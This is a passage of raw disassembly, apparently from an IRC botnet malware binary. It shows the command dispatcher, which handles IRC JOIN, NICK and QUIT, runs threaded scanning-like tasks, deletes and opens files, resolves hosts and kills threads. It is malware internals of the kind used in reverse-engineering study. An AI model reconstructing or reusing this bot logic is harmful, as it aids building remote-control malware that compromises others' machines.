loc_41347B: ; CODE XREF: sub_40EE72+4673�j
lea eax, [ebp+var_75C]
push 1FFh
push eax
lea eax, [ebp+var_3F8]
push 0FFh
push eax
push [ebp+arg_0]
call ds:dword_43F698
test eax, eax
jz short loc_4134DE
lea eax, [ebp+var_75C]
push eax
lea eax, [ebp+var_3F8]
push eax
lea eax, [ebp+var_15B0]
push [ebp+arg_0]
push offset dword_4364CC
push eax
call sub_4172AE
push ebx
lea eax, [ebp+var_15B0]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
add esp, 28h
loc_4134DE: ; CODE XREF: sub_40EE72+462C�j
inc [ebp+arg_0]
cmp [ebp+arg_0], 0Ah
jl short loc_41347B
lea eax, [ebp+var_2DC]
push offset dword_436498
push eax
call sub_4172AE
pop ecx
pop ecx
loc_4134FA: ; CODE XREF: sub_40EE72+4600�j
push offset aFrame ; "frame"
push edi
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_4135A0
cmp [ebp+esi+var_8C], ebx
jz short loc_41358D
cmp [ebp+esi+var_88], ebx
jz short loc_41358D
cmp [ebp+esi+var_84], ebx
jz short loc_41358D
mov eax, [ebp+esi+var_80]
cmp eax, ebx
jz short loc_41358D
push eax
call sub_41781F
pop ecx
push eax
push [ebp+esi+var_84]
call sub_41781F
pop ecx
push eax
push [ebp+esi+var_88]
call sub_41781F
pop ecx
push eax
push [ebp+esi+var_8C]
call sub_4087EE
add esp, 10h
test eax, eax
jnz short loc_413586
push [ebp+esi+var_8C]
lea eax, [ebp+var_2DC]
push offset dword_436454
push eax
call sub_4172AE
add esp, 0Ch
jmp short loc_4135A0
; ---------------------------------------------------------------------------
loc_413586: ; CODE XREF: sub_40EE72+46F5�j
push offset dword_436410
jmp short loc_413592
; ---------------------------------------------------------------------------
loc_41358D: ; CODE XREF: sub_40EE72+46A4�j
; sub_40EE72+46AD�j ...
push offset dword_4363C8
loc_413592: ; CODE XREF: sub_40EE72+4719�j
lea eax, [ebp+var_2DC]
push eax
call sub_4172AE
pop ecx
pop ecx
loc_4135A0: ; CODE XREF: sub_40EE72+4697�j
; sub_40EE72+4712�j
push offset aVideo ; "video"
push edi
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_413A62
mov eax, [ebp+esi+var_8C]
cmp eax, ebx
mov [ebp+arg_18], eax
jz short loc_413639
mov eax, [ebp+esi+var_88]
cmp eax, ebx
mov [ebp+arg_0], eax
jz short loc_413639
mov eax, [ebp+esi+var_84]
cmp eax, ebx
mov [ebp+arg_10], eax
jz short loc_413639
mov edi, [ebp+esi+var_80]
cmp edi, ebx
jz short loc_413639
mov esi, [ebp+esi+var_7C]
cmp esi, ebx
jz short loc_413639
push esi
call sub_41781F
pop ecx
push eax
push edi
call sub_41781F
pop ecx
push eax
push [ebp+arg_10]
call sub_41781F
pop ecx
push eax
push [ebp+arg_0]
call sub_41781F
pop ecx
push eax
push [ebp+arg_18]
call sub_4089E7
add esp, 14h
test eax, eax
jnz short loc_41362F
push [ebp+arg_18]
push offset dword_43638C
jmp loc_411888
; ---------------------------------------------------------------------------
loc_41362F: ; CODE XREF: sub_40EE72+47AE�j
push offset dword_43633C
jmp loc_413A54
; ---------------------------------------------------------------------------
loc_413639: ; CODE XREF: sub_40EE72+474F�j
; sub_40EE72+475D�j ...
push offset dword_4362F0
jmp loc_413A54
; ---------------------------------------------------------------------------
loc_413643: ; CODE XREF: sub_40EE72+1CF0�j
; sub_40EE72+1D07�j
push offset aR ; "r"
push edi
call sub_4179A8
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_4136BE
mov ebx, 200h
push esi
lea eax, [ebp+var_2DC]
push ebx
push eax
call sub_41900C
add esp, 0Ch
loc_41366C: ; CODE XREF: sub_40EE72+4829�j
test eax, eax
jz short loc_41369D
push 1
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
push esi
lea eax, [ebp+var_2DC]
push ebx
push eax
call sub_41900C
add esp, 20h
jmp short loc_41366C
; ---------------------------------------------------------------------------
loc_41369D: ; CODE XREF: sub_40EE72+47FC�j
push esi
call sub_417900
pop ecx
lea eax, [ebp+var_2DC]
push edi
push offset dword_4362BC
push eax
call sub_4172AE
add esp, 0Ch
jmp loc_4110FD
; ---------------------------------------------------------------------------
loc_4136BE: ; CODE XREF: sub_40EE72+47E2�j
push edi
push offset dword_43628C
jmp loc_4110B1
; ---------------------------------------------------------------------------
loc_4136C9: ; CODE XREF: sub_40EE72+1CC2�j
; sub_40EE72+1CD9�j
cmp [ebp+var_C], ebx
jz loc_414F45
push edi
push [ebp+var_C]
call sub_417880
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_414F45
push offset asc_42A660 ; "\n"
push esi
call sub_4179D0
push esi
call sub_40B358
add esp, 0Ch
test eax, eax
jnz short loc_413709
push offset dword_436250
jmp loc_413A54
; ---------------------------------------------------------------------------
loc_413709: ; CODE XREF: sub_40EE72+488B�j
push esi
push offset dword_436228
jmp loc_414AB2
; ---------------------------------------------------------------------------
loc_413714: ; CODE XREF: sub_40EE72+1C94�j
; sub_40EE72+1CAB�j
cmp [ebp+var_C], ebx
jz loc_414F45
push edi
push [ebp+var_C]
call sub_417880
pop ecx
cmp eax, ebx
pop ecx
jz loc_414F45
push eax
call sub_40AAFA
test eax, eax
pop ecx
jnz short loc_413745
push offset unk_4361FC
jmp loc_413A54
; ---------------------------------------------------------------------------
loc_413745: ; CODE XREF: sub_40EE72+48C7�j
push offset dword_4361D0
jmp loc_413A54
; ---------------------------------------------------------------------------
loc_41374F: ; CODE XREF: sub_40EE72+1C66�j
; sub_40EE72+1C7D�j
push 7Fh
lea eax, [ebp+var_6EC]
push edi
push eax
call sub_418C10
mov esi, [ebp+esi+var_8C]
add esp, 0Ch
cmp esi, ebx
jz short loc_41377E
push 7Fh
lea eax, [ebp+var_66C]
push esi
push eax
call sub_418C10
add esp, 0Ch
loc_41377E: ; CODE XREF: sub_40EE72+48F8�j
push 7Fh
lea eax, [ebp+var_5EC]
push [ebp+var_8C]
push eax
call sub_418C10
mov eax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_6F0], eax
mov eax, [ebp+var_8]
mov [ebp+var_568], eax
mov eax, [ebp+var_4]
mov [ebp+var_564], eax
push edi
lea eax, [ebp+var_2DC]
push offset dword_4361A8
push eax
call sub_4172AE
push ebx
lea eax, [ebp+var_2DC]
push 15h
push eax
call sub_416D5A
add esp, 18h
mov [ebp+var_56C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_6F0]
push ebx
push eax
push offset sub_40BC4B
push ebx
push ebx
call ds:dword_4240A0 ; CreateThread
mov ecx, [ebp+var_56C]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4450D4[ecx], eax
jz short loc_41381F
loc_413809: ; CODE XREF: sub_40EE72+49AB�j
cmp [ebp+var_560], ebx
jnz loc_414AC1
push 32h
call ds:dword_424064 ; Sleep
jmp short loc_413809
; ---------------------------------------------------------------------------
loc_41381F: ; CODE XREF: sub_40EE72+4995�j
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
push offset unk_43615C
jmp loc_414AB2
; ---------------------------------------------------------------------------
loc_413830: ; CODE XREF: sub_40EE72+1C38�j
; sub_40EE72+1C4F�j
push ebx
push [ebp+var_8C]
push [ebp+arg_4]
push edi
call sub_406387
add esp, 10h
push edi
push offset dword_436138
jmp loc_414F3E
; ---------------------------------------------------------------------------
loc_41384E: ; CODE XREF: sub_40EE72+1C0A�j
; sub_40EE72+1C21�j
push 14h
lea eax, [ebp+var_708]
push ebx
push eax
call sub_417330
add esp, 0Ch
lea eax, [ebp+var_6F4]
push edi
push offset aS_3 ; "%s"
push eax
call sub_4172AE
mov eax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_710], eax
lea eax, [ebp+var_D8]
push eax
lea eax, [ebp+var_5F0]
push 80h
push eax
call sub_41782A
mov eax, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_568], eax
mov eax, [ebp+var_8]
mov [ebp+var_564], eax
lea eax, [ebp+var_5F0]
push eax
lea eax, [ebp+var_6F4]
push eax
lea eax, [ebp+var_2DC]
push offset dword_436104
push eax
call sub_4172AE
push ebx
lea eax, [ebp+var_2DC]
push 12h
push eax
call sub_416D5A
add esp, 1Ch
mov [ebp+var_56C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_710]
push ebx
push eax
push offset sub_40C512
push ebx
push ebx
call ds:dword_4240A0 ; CreateThread
mov ecx, [ebp+var_56C]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4450D4[ecx], eax
jz short loc_413927
loc_413911: ; CODE XREF: sub_40EE72+4AB3�j
cmp [ebp+var_560], ebx
jnz loc_414E0F
push 32h
call ds:dword_424064 ; Sleep
jmp short loc_413911
; ---------------------------------------------------------------------------
loc_413927: ; CODE XREF: sub_40EE72+4A9D�j
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
push offset dword_4385B0
jmp loc_414E00
; ---------------------------------------------------------------------------
loc_413938: ; CODE XREF: sub_40EE72+1BDC�j
; sub_40EE72+1BF3�j
push edi
call ds:dword_424158 ; DeleteFileA
test eax, eax
jz short loc_413962
push edi
push offset dword_4360D8
lea eax, [ebp+var_2DC]
push 200h
push eax
call sub_41782A
add esp, 10h
jmp loc_4110DC
; ---------------------------------------------------------------------------
loc_413962: ; CODE XREF: sub_40EE72+4ACF�j
push offset dword_436A78
call sub_40AA35
pop ecx
push eax
jmp loc_414562
; ---------------------------------------------------------------------------
loc_413973: ; CODE XREF: sub_40EE72+1BAE�j
; sub_40EE72+1BC5�j
push edi
call sub_41781F
push eax
call sub_415417
pop ecx
pop ecx
push 1
pop esi
cmp eax, esi
push edi
jnz short loc_413990
push offset unk_4360A0
jmp short loc_413995
; ---------------------------------------------------------------------------
loc_413990: ; CODE XREF: sub_40EE72+4B15�j
push offset unk_43605C
loc_413995: ; CODE XREF: sub_40EE72+4B1C�j
lea eax, [ebp+var_2DC]
push eax
call sub_4172AE
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz loc_411100
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
add esp, 14h
jmp loc_411100
; ---------------------------------------------------------------------------
loc_4139CE: ; CODE XREF: sub_40EE72+1B80�j
; sub_40EE72+1B97�j
push ebx
push ebx
push edi
push [ebp+var_4]
push ebx
push [ebp+arg_4]
call sub_415188
add esp, 18h
cmp eax, 1
push edi
jnz short loc_4139F0
push offset unk_436028
jmp loc_4110B1
; ---------------------------------------------------------------------------
loc_4139F0: ; CODE XREF: sub_40EE72+4B72�j
push offset unk_435FE8
jmp loc_4110B1
; ---------------------------------------------------------------------------
loc_4139FA: ; CODE XREF: sub_40EE72+1B52�j
; sub_40EE72+1B69�j
push edi
call ds:dword_43F6A8 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_413A34
push 2
lea eax, [ebp+arg_0]
push 4
push eax
call ds:dword_43F620 ; gethostbyaddr
cmp eax, ebx
jz short loc_413A4F
push dword ptr [eax]
loc_413A1D: ; CODE XREF: sub_40EE72+4BDB�j
push edi
lea eax, [ebp+var_2DC]
push offset dword_435FBC
push eax
call sub_4172AE
add esp, 10h
jmp short loc_413A62
; ---------------------------------------------------------------------------
loc_413A34: ; CODE XREF: sub_40EE72+4B95�j
push edi
call ds:dword_43F6EC ; gethostbyname
cmp eax, ebx
jz short loc_413A4F
mov eax, [eax+0Ch]
mov eax, [eax]
push dword ptr [eax]
call ds:dword_43F6F4 ; inet_ntoa
push eax
jmp short loc_413A1D
; ---------------------------------------------------------------------------
loc_413A4F: ; CODE XREF: sub_40EE72+4BA7�j
; sub_40EE72+4BCB�j
push offset dword_435F84
loc_413A54: ; CODE XREF: sub_40EE72+3E2D�j
; sub_40EE72+3FBC�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_4172AE
pop ecx
pop ecx
loc_413A62: ; CODE XREF: sub_40EE72+2A25�j
; sub_40EE72+3B35�j ...
cmp [ebp+var_8], ebx
jnz loc_414AC1
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
add esp, 14h
jmp loc_414AC1
; ---------------------------------------------------------------------------
loc_413A8C: ; CODE XREF: sub_40EE72+1B24�j
; sub_40EE72+1B3B�j
push 7Fh
push edi
push [ebp+arg_14]
call sub_418C10
add esp, 0Ch
push edi
push offset dword_435F50
jmp loc_410E48
; ---------------------------------------------------------------------------
loc_413AA5: ; CODE XREF: sub_40EE72+1AF6�j
; sub_40EE72+1B0D�j
push 5
push ebx
push ebx
push edi
push offset aOpen ; "open"
push ebx
call ds:dword_43F5DC
test eax, eax
push edi
jz short loc_413AC5
push offset unk_435F14
jmp loc_4110B1
; ---------------------------------------------------------------------------
loc_413AC5: ; CODE XREF: sub_40EE72+4C47�j
push offset unk_435ED0
jmp loc_4110B1
; ---------------------------------------------------------------------------
loc_413ACF: ; CODE XREF: sub_40EE72+1AC8�j
; sub_40EE72+1ADF�j
mov al, [edi]
mov ds:byte_42F5C4, al
movsx eax, byte ptr [edi]
push eax
push offset dword_435E9C
jmp loc_410E48
; ---------------------------------------------------------------------------
loc_413AE4: ; CODE XREF: sub_40EE72+1A9A�j
; sub_40EE72+1AB1�j
push edi
call sub_41781F
test eax, eax
pop ecx
jle loc_414F45
push edi
call sub_41781F
cmp eax, 1F4h
pop ecx
jge loc_414F45
push ebx
push ebx
lea eax, [ebp+var_B8]
push 2
push eax
call sub_415CFF
add esp, 10h
push eax
lea eax, [ebp+var_2DC]
push offset dword_4367E4
push eax
call sub_4172AE
add esp, 0Ch
jmp loc_412FD0
; ---------------------------------------------------------------------------
loc_413B32: ; CODE XREF: sub_40EE72+1A6C�j
; sub_40EE72+1A83�j
push edi
call sub_41781F
test eax, eax
pop ecx
jle loc_40F239
push edi
call sub_41781F
mov esi, 1F4h
pop ecx
cmp eax, esi
jge loc_40F239
push offset aQuitLater ; "QUIT :later\r\n"
push edi
call sub_41781F
imul eax, 234h
pop ecx
push ds:dword_4450CC[eax]
call sub_40D633
pop ecx
pop ecx
push esi
call ds:dword_424064 ; Sleep
push edi
call sub_41781F
imul eax, 234h
pop ecx
push ds:dword_4450CC[eax]
call ds:dword_43F700 ; closesocket
push [ebp+var_10]
push edi
call sub_41781F
imul eax, 234h
pop ecx
push ds:dword_4450D4[eax]
call ds:dword_424168 ; TerminateThread
push edi
call sub_41781F
imul eax, 234h
push edi
mov ds:dword_4450D4[eax], ebx
call sub_41781F
imul eax, 234h
pop ecx
pop ecx
mov byte ptr ds:dword_444EC0[eax], bl
jmp loc_40F239
; ---------------------------------------------------------------------------
loc_413BDB: ; CODE XREF: sub_40EE72+1A3E�j
; sub_40EE72+1A55�j
push edi
push offset aAll ; "all"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_413C19
call sub_416F23
cmp eax, ebx
jle short loc_413C0F
push eax
push offset dword_435E50
loc_413BFB: ; CODE XREF: sub_40EE72+15E2�j
; sub_40EE72+2A8F�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_4172AE
loc_413C07: ; CODE XREF: sub_40EE72+3CA4�j
add esp, 0Ch
jmp loc_41460A
; ---------------------------------------------------------------------------
loc_413C0F: ; CODE XREF: sub_40EE72+4D81�j
push offset dword_435E18
jmp loc_4145FC
; ---------------------------------------------------------------------------
loc_413C19: ; CODE XREF: sub_40EE72+4D78�j
mov eax, [ebp+var_C0]
lea edi, [eax+1]
cmp edi, 20h
jnb loc_40F239
lea eax, [ebp+edi*4+var_94]
mov [ebp+arg_24], eax
loc_413C35: ; CODE XREF: sub_40EE72+4E34�j
mov eax, [ebp+arg_24]
mov esi, [eax]
cmp esi, ebx
jz loc_40F239
push esi
call sub_41781F
push eax
call sub_416E95
pop ecx
pop ecx
test eax, eax
push esi
jz short loc_413C5C
push offset dword_435DE4
jmp short loc_413C61
; ---------------------------------------------------------------------------
loc_413C5C: ; CODE XREF: sub_40EE72+4DE1�j
push offset dword_435DA8
loc_413C61: ; CODE XREF: sub_40EE72+4DE8�j
lea eax, [ebp+var_2DC]
push eax
call sub_4172AE
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_413C91
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
add esp, 14h
loc_413C91: ; CODE XREF: sub_40EE72+4E01�j
lea eax, [ebp+var_2DC]
push eax
call sub_40BF6D
add [ebp+arg_24], 4
inc edi
cmp edi, 20h
pop ecx
jb short loc_413C35
jmp loc_40F239
; ---------------------------------------------------------------------------
loc_413CAD: ; CODE XREF: sub_40EE72+1A10�j
; sub_40EE72+1A27�j
cmp [ebp+var_C], ebx
jz loc_414F45
push edi
push [ebp+var_C]
call sub_417880
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_414F45
push esi
push offset dword_428598
push [ebp+arg_4]
call sub_40D633
add esp, 0Ch
push esi
push offset dword_435D80
jmp loc_414F3E
; ---------------------------------------------------------------------------
loc_413CE7: ; CODE XREF: sub_40EE72+19E2�j
; sub_40EE72+19F9�j
push edi
push offset dword_436714
push [ebp+arg_4]
call sub_40D633
add esp, 0Ch
push edi
push offset dword_435D50
jmp loc_414F3E
; ---------------------------------------------------------------------------
loc_413D03: ; CODE XREF: sub_40EE72+19B4�j
; sub_40EE72+19CB�j
push [ebp+esi+var_8C]
push edi
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_40D633
add esp, 10h
push edi
push offset dword_435D20
jmp loc_414F3E
; ---------------------------------------------------------------------------
loc_413D26: ; CODE XREF: sub_40EE72+1986�j
; sub_40EE72+199D�j
push edi
push offset aNickS ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_40D633
add esp, 0Ch
push edi
push offset dword_435CEC
jmp loc_414F3E
; ---------------------------------------------------------------------------
loc_413D42: ; CODE XREF: sub_40EE72+194B�j
; sub_40EE72+1960�j
mov al, ds:byte_42F5F2
mov [ebp+arg_0], ebx
cmp al, bl
mov edx, offset byte_42F5F2
jz loc_40F239
mov ecx, edx
loc_413D59: ; CODE XREF: sub_40EE72+4EEF�j
inc [ebp+arg_0]
add ecx, 0Bh
cmp [ecx], bl
jnz short loc_413D59
cmp al, bl
jz loc_40F239
mov [ebp+arg_18], edx
loc_413D6E: ; CODE XREF: sub_40EE72+51BA�j
push 8
call sub_416FA2
pop ecx
mov ecx, eax
mov eax, 190h
cdq
idiv [ebp+arg_0]
add eax, ecx
cmp eax, 258h
jle short loc_413DBD
push ecx
lea eax, [ebp+var_2DC]
push offset unk_437028
push eax
call sub_4172AE
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
add esp, 20h
jmp loc_414023
; ---------------------------------------------------------------------------
loc_413DBD: ; CODE XREF: sub_40EE72+4F16�j
or [ebp+var_314], 0FFFFFFFFh
cmp ds:dword_42ACB0, ebx
mov [ebp+var_318], 64h
mov [ebp+var_32C], 7
mov [ebp+var_328], 320h
mov [ebp+arg_0], ebx
jz short loc_413E2E
mov eax, [ebp+arg_18]
mov edi, offset dword_42ACB0
lea esi, [eax-0Ah]
loc_413DF8: ; CODE XREF: sub_40EE72+4F9E�j
lea eax, [edi-28h]
push esi
push eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz short loc_413E14
inc [ebp+arg_0]
add edi, 3Ch
cmp [edi], ebx
jnz short loc_413DF8
jmp short loc_413E2E
; ---------------------------------------------------------------------------
loc_413E14: ; CODE XREF: sub_40EE72+4F94�j
mov eax, [ebp+arg_0]
mov ecx, eax
mov [ebp+var_314], eax
imul ecx, 3Ch
mov ecx, ds:dword_42ACB0[ecx]
mov [ebp+var_330], ecx
loc_413E2E: ; CODE XREF: sub_40EE72+4F79�j
; sub_40EE72+4FA0�j
cmp [ebp+var_330], ebx
jz loc_414037
push 10h
lea eax, [ebp+arg_10]
pop esi
push eax
lea eax, [ebp+var_2EC]
push eax
mov [ebp+arg_10], esi
push [ebp+arg_4]
call ds:dword_43F60C ; getsockname
mov al, [ebp+var_9C7]
push esi
neg al
sbb eax, eax
and ax, 100h
add eax, 0FFFFh
and [ebp+var_2E8], eax
push [ebp+var_2E8]
call ds:dword_43F6F4 ; inet_ntoa
push eax
lea eax, [ebp+var_444]
push eax
call sub_418C10
xor eax, eax
cmp [ebp+var_9C7], bl
push 30h
setnz al
inc eax
inc eax
mov edi, eax
lea eax, [ebp+var_444]
push eax
call sub_418F10
add esp, 14h
cmp edi, ebx
mov byte ptr [ebp+arg_24+3], bl
jle short loc_413ED0
loc_413EAE: ; CODE XREF: sub_40EE72+505C�j
cmp eax, ebx
jz short loc_413ED0
mov byte ptr [eax], 78h
lea eax, [ebp+var_444]
push 30h
push eax
call sub_418F10
inc byte ptr [ebp+arg_24+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+arg_24+3]
cmp ecx, edi
jl short loc_413EAE
loc_413ED0: ; CODE XREF: sub_40EE72+503A�j
; sub_40EE72+503E�j
mov eax, [ebp+arg_4]
push [ebp+var_8C]
mov esi, [ebp+var_4]
mov [ebp+var_334], eax
mov eax, [ebp+var_8]
mov edi, 80h
mov [ebp+var_308], eax
lea eax, [ebp+var_434]
push edi
push eax
mov [ebp+var_304], 1
mov [ebp+var_30C], esi
call sub_41782A
push offset byte_43C80C
push offset aF ; "#f"
call sub_4176D0
add esp, 14h
test eax, eax
jz short loc_413F3A
push offset aF ; "#f"
lea eax, [ebp+var_3B4]
push edi
push eax
call sub_41782A
add esp, 0Ch
jmp short loc_413F40
; ---------------------------------------------------------------------------
loc_413F3A: ; CODE XREF: sub_40EE72+50AF�j
mov [ebp+var_3B4], bl
loc_413F40: ; CODE XREF: sub_40EE72+50C6�j
cmp [ebp+var_304], ebx
mov eax, offset aRandom_0 ; "Random"
jnz short loc_413F52
mov eax, offset aSequential ; "Sequential"
loc_413F52: ; CODE XREF: sub_40EE72+50D9�j
push [ebp+var_318]
lea ecx, [ebp+var_444]
push [ebp+var_328]
push [ebp+var_32C]
push [ebp+var_330]
push ecx
push eax
lea eax, [ebp+var_2DC]
push offset unk_435C74
push eax
call sub_4172AE
push ebx
lea eax, [ebp+var_2DC]
push 8
push eax
call sub_416D5A
add esp, 2Ch
mov [ebp+var_324], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_444]
push ebx
push eax
push offset sub_40797F
push ebx
push ebx
call ds:dword_4240A0 ; CreateThread
mov ecx, [ebp+var_324]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4450D4[ecx], eax
jz short loc_413FDC
loc_413FCA: ; CODE XREF: sub_40EE72+5168�j
cmp [ebp+var_300], ebx
jnz short loc_413FF7
push 32h
call ds:dword_424064 ; Sleep
jmp short loc_413FCA
; ---------------------------------------------------------------------------
loc_413FDC: ; CODE XREF: sub_40EE72+5156�j
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2DC]
push offset unk_436F18
push eax
call sub_4172AE
add esp, 0Ch
loc_413FF7: ; CODE XREF: sub_40EE72+515E�j
cmp [ebp+var_8], ebx
jnz short loc_414016
push ebx
lea eax, [ebp+var_2DC]
push esi
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
add esp, 14h
loc_414016: ; CODE XREF: sub_40EE72+5188�j
lea eax, [ebp+var_2DC]
push eax
call sub_40BF6D
pop ecx
loc_414023: ; CODE XREF: sub_40EE72+4F46�j
add [ebp+arg_18], 0Bh
mov eax, [ebp+arg_18]
cmp [eax], bl
jnz loc_413D6E
jmp loc_40F239
; ---------------------------------------------------------------------------
loc_414037: ; CODE XREF: sub_40EE72+3108�j
; sub_40EE72+4FC2�j
push offset unk_435C30
jmp loc_4145FC
; ---------------------------------------------------------------------------
loc_414041: ; CODE XREF: sub_40EE72+1921�j
; sub_40EE72+1936�j
push [ebp+var_8C]
lea eax, [ebp+var_A4]
push 80h
push eax
call sub_41782A
mov eax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_A8], eax
mov eax, [ebp+var_4]
mov [ebp+var_20], eax
mov eax, [ebp+var_8]
mov [ebp+var_1C], eax
push offset unk_435BF8
lea eax, [ebp+var_2DC]
push 200h
push eax
call sub_41782A
push ebx
lea eax, [ebp+var_2DC]
push 1Eh
push eax
call sub_416D5A
add esp, 18h
mov [ebp+var_24], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_A8]
push ebx
push eax
push offset sub_409037
push ebx
push ebx
call ds:dword_4240A0 ; CreateThread
mov ecx, [ebp+var_24]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4450D4[ecx], eax
jz short loc_4140DA
loc_4140C7: ; CODE XREF: sub_40EE72+5266�j
cmp [ebp+var_18], ebx
jnz loc_414E0F
push 32h
call ds:dword_424064 ; Sleep
jmp short loc_4140C7
; ---------------------------------------------------------------------------
loc_4140DA: ; CODE XREF: sub_40EE72+5253�j
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
push offset unk_435BAC
jmp loc_414E00
; ---------------------------------------------------------------------------
loc_4140EB: ; CODE XREF: sub_40EE72+18F7�j
; sub_40EE72+190C�j
push 4
call sub_416FA2
test eax, eax
pop ecx
jle short loc_414101
push offset unk_435B80
jmp loc_410D38
; ---------------------------------------------------------------------------
loc_414101: ; CODE XREF: sub_40EE72+5283�j
mov eax, [ebp+esi+var_90]
cmp eax, ebx
jz short loc_414124
push eax
mov edi, 104h
lea eax, [ebp+var_7FC]
push edi
push eax
call sub_41782A
add esp, 0Ch
jmp short loc_414138
; ---------------------------------------------------------------------------
loc_414124: ; CODE XREF: sub_40EE72+5298�j
mov edi, 104h
lea eax, [ebp+var_7FC]
push edi
push eax
push ebx
call ds:off_424094
loc_414138: ; CODE XREF: sub_40EE72+52B0�j
mov esi, [ebp+esi+var_8C]
cmp esi, ebx
jnz short loc_414148
mov esi, offset byte_42F678
loc_414148: ; CODE XREF: sub_40EE72+52CF�j
push esi
lea eax, [ebp+var_6F8]
push edi
push eax
call sub_41782A
mov eax, ds:dword_42F5AC
push 7Fh
push [ebp+var_8C]
mov [ebp+var_5EC], eax
mov eax, [ebp+arg_4]
mov [ebp+var_5F0], ebx
mov [ebp+var_800], eax
lea eax, [ebp+var_5E8]
push eax
call sub_418C10
mov eax, [ebp+var_4]
add esp, 18h
mov [ebp+var_568], eax
mov eax, [ebp+var_8]
mov [ebp+var_564], eax
lea eax, [ebp+var_6F8]
push eax
lea eax, [ebp+var_7FC]
push eax
lea eax, [ebp+var_2DC]
push [ebp+var_5EC]
push offset unk_42B328
push eax
call sub_4172AE
push ebx
lea eax, [ebp+var_2DC]
push 4
push eax
call sub_416D5A
add esp, 20h
mov [ebp+var_5F4], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_800]
push ebx
push eax
push offset sub_406C19
push ebx
push ebx
call ds:dword_4240A0 ; CreateThread
mov ecx, [ebp+var_5F4]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4450D4[ecx], eax
jz short loc_41421B
loc_414205: ; CODE XREF: sub_40EE72+53A7�j
cmp [ebp+var_560], ebx
jnz loc_410E57
push 32h
call ds:dword_424064 ; Sleep
jmp short loc_414205
; ---------------------------------------------------------------------------
loc_41421B: ; CODE XREF: sub_40EE72+5391�j
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
push offset unk_435B38
jmp loc_410E48
; ---------------------------------------------------------------------------
loc_41422C: ; CODE XREF: sub_40EE72+18CD�j
; sub_40EE72+18E2�j
mov edi, [ebp+esi+var_90]
cmp edi, ebx
jz short loc_41424B
push edi
call sub_41781F
test eax, eax
pop ecx
jz short loc_41424B
push edi
call sub_41781F
pop ecx
jmp short loc_414250
; ---------------------------------------------------------------------------
loc_41424B: ; CODE XREF: sub_40EE72+53C3�j
; sub_40EE72+53CE�j
mov eax, ds:dword_42F5B0
loc_414250: ; CODE XREF: sub_40EE72+53D7�j
mov esi, [ebp+esi+var_8C]
mov [ebp+var_57C], eax
xor eax, eax
cmp [ebp+var_9C4], bl
setz al
cmp esi, ebx
mov [ebp+var_568], eax
jz short loc_414283
lea eax, [ebp+var_680]
push esi
push eax
call sub_4172AE
pop ecx
pop ecx
jmp short loc_4142AE
; ---------------------------------------------------------------------------
loc_414283: ; CODE XREF: sub_40EE72+53FE�j
lea eax, [ebp+var_3FC]
push 104h
push eax
call ds:dword_424068 ; GetSystemDirectoryA
push ebx
push ebx
lea eax, [ebp+var_2E8]
push ebx
push eax
lea eax, [ebp+var_3FC]
push eax
call sub_4192B8
add esp, 14h
loc_4142AE: ; CODE XREF: sub_40EE72+540F�j
lea eax, [ebp+var_680]
push eax
call sub_417AB0
cmp [ebp+eax+var_681], 5Ch
pop ecx
jnz short loc_4142D9
lea eax, [ebp+var_680]
push eax
call sub_417AB0
pop ecx
mov [ebp+eax+var_681], bl
loc_4142D9: ; CODE XREF: sub_40EE72+5451�j
push [ebp+var_8C]
mov esi, [ebp+arg_4]
lea eax, [ebp+var_908]
mov [ebp+var_90C], esi
push 80h
push eax
call sub_41782A
mov eax, [ebp+var_8]
mov edi, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_56C], eax
lea eax, [ebp+var_680]
mov [ebp+var_570], edi
push eax
push [ebp+var_57C]
push esi
call sub_40AEE0
pop ecx
push eax
lea eax, [ebp+var_2DC]
push offset unk_42B20C
push eax
call sub_4172AE
push ebx
